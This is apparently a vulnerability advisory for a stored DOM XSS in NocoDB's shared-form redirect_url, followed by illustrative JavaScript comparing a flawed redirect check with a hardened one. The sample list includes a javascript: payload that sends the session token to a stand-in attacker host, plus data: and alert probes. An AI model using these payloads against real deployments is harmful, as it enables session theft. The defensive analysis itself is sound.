CVE-2026-47387
Status: Received - Intake
DOM-Based XSS in NocoDB via Malicious Redirect URL

Publication date: 2026-06-23

Last updated on: 2026-06-23

Assigner: GitHub, Inc.

Description
NocoDB is software for building databases as spreadsheets. Prior to 2026.05.1, the shared form-view submit handler (packages/nc-gui/composables/useSharedFormViewStore.ts) in NocoDB writes the form's redirect_url to window.location.href after a same-host check that does not validate the URL scheme. A user with editor role (or above) on any base can plant a javascript: URL in the form's redirect_url; when an authenticated viewer opens the share-link and submits the form, the payload executes in the NocoDB origin and can read the session token from localStorage["nocodb-gui-v2"]. This vulnerability is fixed in 2026.05.1.
Meta Information
Generated: 2026-06-24
EPSS Evaluated: N/A
Affected Vendors & Products
Showing 1 associated CPE
Vendor | Product | Version / Range
nocodb | nocodb | versions before 2026.05.1 (2026.05.1 is the fixed release and is not affected)
CWE
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Executive Summary

This vulnerability exists in NocoDB versions prior to 2026.05.1 in the shared form-view submit handler. The handler writes the form's redirect_url to window.location.href after performing a same-host check that does not validate the URL scheme.

A user with an editor role or higher on any base can insert a javascript: URL into the form's redirect_url. When an authenticated viewer opens the share-link and submits the form, the malicious JavaScript payload executes within the NocoDB origin.

Because the payload runs in the NocoDB origin, it can read the session token stored in localStorage under the key "nocodb-gui-v2" (localStorage, unlike an HttpOnly cookie, is fully readable by any script running in the origin) and exfiltrate it, compromising the viewer's session.

The vulnerability was fixed in version 2026.05.1.

Compliance Impact

This vulnerability allows an attacker with editor role or above to execute arbitrary JavaScript in the context of the NocoDB origin, potentially accessing session tokens stored in localStorage. Such unauthorized access to session tokens can lead to unauthorized data access or data breaches.

Unauthorized access to sensitive data or session tokens can impact compliance with data protection regulations such as GDPR and HIPAA, which require protection of personal and sensitive information against unauthorized access and breaches.

If exploited, the vulnerability could therefore put an organization out of compliance with those standards through unauthorized data exposure or compromise of user sessions.

Impact Analysis

This vulnerability can lead to session token theft by executing malicious JavaScript in the context of the NocoDB origin.

An attacker with editor or higher privileges on any base can store a malicious redirect URL in a form; when an authenticated viewer opens the share link and submits the form, the handler navigates to that URL and the viewer's session token is stolen.

With the stolen session token, the attacker could impersonate the victim, gaining unauthorized access to their NocoDB session and potentially sensitive data.

Mitigation Strategies

To mitigate this vulnerability, upgrade NocoDB to version 2026.05.1 or later, where the issue has been fixed.

The root cause is that a same-host check on its own is not sufficient: a javascript: URL is not a host at all, so a check that reasons only about the host says nothing about what window.location.href will do with the value. Any user with an editor role or above on any base can plant such a URL in a form's redirect_url, so the attacker does not need access to the victim's base; the only victim interaction required is opening the share link and submitting the form while logged in. Until the upgrade is complete, treat existing share-link forms' redirect targets as untrusted and review them for any scheme other than http or https; after upgrading, verify that a redirect_url beginning with javascript: is rejected rather than navigated to.
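The block below is an added illustration of the bug class in the Description and of the validation the Mitigation section refers to. It is not NocoDB's code and is not taken from this page: the app origin `https://nocodb.example`, the two check functions and the sample URLs are assumptions constructed for the example. The flawed check models one common way a "same-host check" lets a javascript: URL through, namely by treating any URL that resolves to an empty host as a same-site relative path; the hardened check allowlists the scheme and compares the full origin.

```javascript
// Added example for CVE-2026-47387's bug class (open redirect check that
// ignores the URL scheme, leading to DOM XSS via window.location.href).
// NOT NocoDB's code: the origin, both checks and the samples are assumptions.

const APP_ORIGIN = "https://nocodb.example"; // assumed origin of the NocoDB UI

// Hypothetical flawed check: resolve the value against the app URL and compare
// hosts, treating a URL with no host (e.g. "/path") as a same-site relative
// path. "javascript:..." and "data:..." also parse with an empty host, so they
// pass, and assigning them to window.location.href runs script in the origin.
function isSameHostFlawed(rawUrl) {
  let u;
  try {
    u = new URL(rawUrl, APP_ORIGIN + "/");
  } catch {
    return false; // unparseable input is at least rejected
  }
  return u.host === "" || u.host === new URL(APP_ORIGIN).host;
}

// Hardened check: only http/https may be navigated to, and the resolved
// origin (scheme + host + port) must equal the app's own origin.
function isSafeRedirect(rawUrl) {
  let u;
  try {
    u = new URL(rawUrl, APP_ORIGIN + "/");
  } catch {
    return false;
  }
  if (u.protocol !== "https:" && u.protocol !== "http:") return false;
  return u.origin === APP_ORIGIN;
}

// Stand-in for the submit handler's decision. No navigation happens here;
// in a browser, "navigate" would mean `window.location.href = rawUrl`.
function decide(rawUrl, check) {
  return check(rawUrl) ? "navigate" : "block";
}

// Constructed sample redirect_url values (not from the advisory).
const SAMPLES = [
  "/dashboard",
  "https://nocodb.example/dashboard/#/nc/form/thanks",
  "https://evil.example/phish",
  "javascript:fetch('https://evil.example/?t='+encodeURIComponent(localStorage['nocodb-gui-v2']))",
  "JavaScript:alert(1)",          // scheme is case-insensitive after parsing
  "  javascript:alert(1)",        // leading whitespace is stripped by the URL parser
  "data:text/html,<script>alert(1)</script>",
];

// Runs every sample through both checks and returns the decisions.
function runComparison() {
  return SAMPLES.map((url) => ({
    url,
    flawed: decide(url, isSameHostFlawed),
    hardened: decide(url, isSafeRedirect),
  }));
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("flawed   hardened url");
  for (const r of runComparison()) {
    console.log(`${r.flawed.padEnd(8)} ${r.hardened.padEnd(8)} ${r.url}`);
  }
}
```

Running the block prints one row per sample with each check's decision. The point for anyone reviewing similar redirect code: a WHATWG URL parser will happily hand back a javascript: or data: URL with an empty host, so a check that reasons about the host alone must be paired with an explicit scheme allowlist, and comparing `origin` is stricter than comparing `host` because it also pins the scheme and port.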
